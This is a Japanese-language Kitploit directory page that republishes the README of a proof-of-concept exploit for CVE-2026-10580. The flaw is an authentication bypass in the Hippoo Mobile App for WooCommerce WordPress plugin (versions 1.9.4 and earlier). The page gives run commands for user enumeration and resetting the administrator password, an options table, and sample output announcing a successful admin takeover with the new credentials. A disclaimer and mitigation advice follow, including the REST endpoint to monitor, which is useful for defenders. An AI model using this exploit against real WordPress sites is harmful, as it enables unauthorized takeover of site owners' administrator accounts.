Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-10580 — CVE-2026-10580 の PoC エクスプロイト - Hippoo Mobile App for WooCommerce (バージョン 1.9.4 以下) における認証バイパス、管理者アカウントの乗っ取りにつながる | Kitploit
ツール/GitHubGitHub/0xgh057r3c0n/cve-2026-10580
認証と認可パスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHub0xgh057r3c0n/cve-2026-10580

CVE-2026-10580

CVE-2026-10580 の PoC エクスプロイト - Hippoo Mobile App for WooCommerce (バージョン 1.9.4 以下) における認証バイパス、管理者アカウントの乗っ取りにつながる

リポジトリを見る
1ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

WordPress

WordPress - Hippoo Mobile App for WooCommerce <= 1.9.4 - 認証バイパスによる管理者アカウント乗っ取り

License: MIT

概要

このツールは、CVE-2026-10580 の概念実証エクスプロイトです。この脆弱性は、WordPressプラグイン Hippoo Mobile App for WooCommerce(バージョン <= 1.9.4)に影響を与える認証バイパスの脆弱性です。この脆弱性により、認証されていない攻撃者が管理者を含む任意のユーザーのパスワードをリセットし、サイト全体を乗っ取ることが可能になります。

⚠️ 重要: このツールは許可されたセキュリティテストおよび教育目的のみを対象としています。所有していないシステムや明示的なテスト許可がないシステムに対して不正に使用することは違法です。

特徴

  • 脆弱なREST APIエンドポイントを介してすべてのWordPressユーザーを列挙
  • 指定されたユーザーID(デフォルト: 管理者ID 1)のパスワードをリセット
  • カラー出力対応のシンプルなコマンドラインインターフェース
  • テスト環境向けにSSL検証を無効にするオプション

使用方法

前提条件

  • Python 3.6+
  • requests ライブラリ

依存関係のインストール:

root@kitploit:~
pip install requests

基本コマンド

root@kitploit:~
python3 exploit.py -t https://target-site.com -p NewPassword123!

オプション

使用例

デフォルトの管理者ID (1) とSSL検証を使用した攻撃:

root@kitploit:~
python3 exploit.py -t https://example.com -p PwnedCVE2026!!

特定のユーザーIDをターゲットにし、SSL検証を無効にする:

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k

バナーなしで実行:

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 --no-banner

出力例

root@kitploit:~
[+] Found 3 user(s)
    - User ID: 1 | Username: admin | Role: administrator
    - User ID: 2 | Username: editor_user | Role: editor
    - User ID: 3 | Username: subscriber1 | Role: subscriber

╔══════════════════════════════════════════════════════════════╗
║             ADMIN TAKEOVER SUCCESSFUL                        ║
╚══════════════════════════════════════════════════════════════╝
    Target: https://example.com
    Login: https://example.com/wp-admin
    Username: admin
    Password: PwnedCVE2026!!

対策

Hippooプラグインを使用している場合は、直ちにパッチ済みバージョン(>1.9.4)にアップデートしてください。さらに:

  • ユーザーアカウントの不正な変更を定期的に監査する
  • ログで /wp-json/wc-hippoo/v1/ext/wp/v2/users への予期しないAPIリクエストを監視する
  • 必要な場合を除き、WordPress REST APIへのアクセスを制限することを検討する

ライセンス

このプロジェクトはMITライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。

作者

0xgh057r3c0n

免責事項

作者はこのツールの誤用について一切の責任を負いません。責任を持って使用し、所有しているか明示的なテスト許可があるシステムでのみ使用してください。

ツールをダウンロード
引数説明
-t, --targetターゲットのWordPressサイトURL(例:https://example.com)
-p, --password管理者アカウントに設定する新しいパスワード
-i, --id乗っ取るユーザーID(デフォルト: 1)
-k, --insecureSSL証明書の検証をスキップ
--no-bannerASCIIバナーを非表示